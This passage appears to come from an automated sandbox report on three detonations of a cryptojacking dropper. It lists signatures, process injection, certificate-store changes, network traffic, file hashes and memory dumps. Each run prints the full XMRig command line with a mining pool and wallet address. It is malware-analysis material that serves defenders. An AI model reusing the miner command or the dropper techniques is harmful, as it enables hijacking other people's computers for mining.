memory/2108-43-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-44-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-45-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-46-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-47-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-48-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-49-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-50-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-51-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-52-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-53-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-54-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-55-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-56-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-57-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-58-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-59-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-60-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-61-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-62-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-63-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-64-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-65-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-66-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-67-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-68-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-69-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-70-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-71-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-72-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-73-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-74-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-75-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-76-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-77-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-78-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-79-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-80-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-81-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-82-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-83-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-84-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data not shown] | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4852 wrote to memory of 3964 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4852 wrote to memory of 3964 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4276,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3716,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=3996 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.173.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3964-16-0x000001E1218E0000-0x000001E121900000-memory.dmp
memory/3964-17-0x000001E121920000-0x000001E121940000-memory.dmp
memory/3964-18-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-20-0x000001E121940000-0x000001E121960000-memory.dmp
memory/3964-21-0x000001E121960000-0x000001E121980000-memory.dmp
memory/3964-19-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-22-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-23-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-24-0x000001E121940000-0x000001E121960000-memory.dmp
memory/3964-25-0x000001E121960000-0x000001E121980000-memory.dmp
memory/3964-26-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-27-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-28-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-29-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-30-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-31-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-32-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-33-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-34-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-35-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-36-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-37-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-38-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-39-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-40-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-41-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-42-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-43-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-44-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-45-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-46-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-47-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-48-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-49-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-50-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-51-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-52-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-53-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-54-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-55-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-56-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-57-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-58-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-59-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-60-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-61-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-62-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-63-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-64-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-65-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-66-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-67-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-68-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-69-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-70-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-71-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-72-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-73-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-74-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-75-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-76-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-77-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-78-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-79-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-80-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-81-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-82-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-83-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-84-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3380 wrote to memory of 3500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3380 wrote to memory of 3500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3500-16-0x00000183696B0000-0x00000183696D0000-memory.dmp
memory/3500-17-0x0000018369910000-0x0000018369930000-memory.dmp
memory/3500-18-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-19-0x00000183FDA90000-0x00000183FDAB0000-memory.dmp
memory/3500-20-0x00000183FD860000-0x00000183FD880000-memory.dmp
memory/3500-21-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-22-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-23-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-25-0x00000183FD860000-0x00000183FD880000-memory.dmp
memory/3500-24-0x00000183FDA90000-0x00000183FDAB0000-memory.dmp
memory/3500-26-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-27-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-28-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-29-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-30-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-31-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-32-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-33-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-34-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-35-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-36-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-37-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-38-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-39-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-40-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-41-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-42-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-43-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-44-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-45-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-46-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-47-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-48-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-49-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-50-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-51-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-52-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-53-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-54-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-55-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-56-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-57-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-58-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-59-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-60-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-61-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-62-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-63-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-64-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-65-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-66-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-67-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-68-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-69-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-70-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-71-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-72-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-73-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-74-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-75-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-76-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-77-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-78-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-79-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-80-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-81-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-82-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-83-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-84-0x00007FF778420000-0x00007FF778F23000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3912 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3912 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
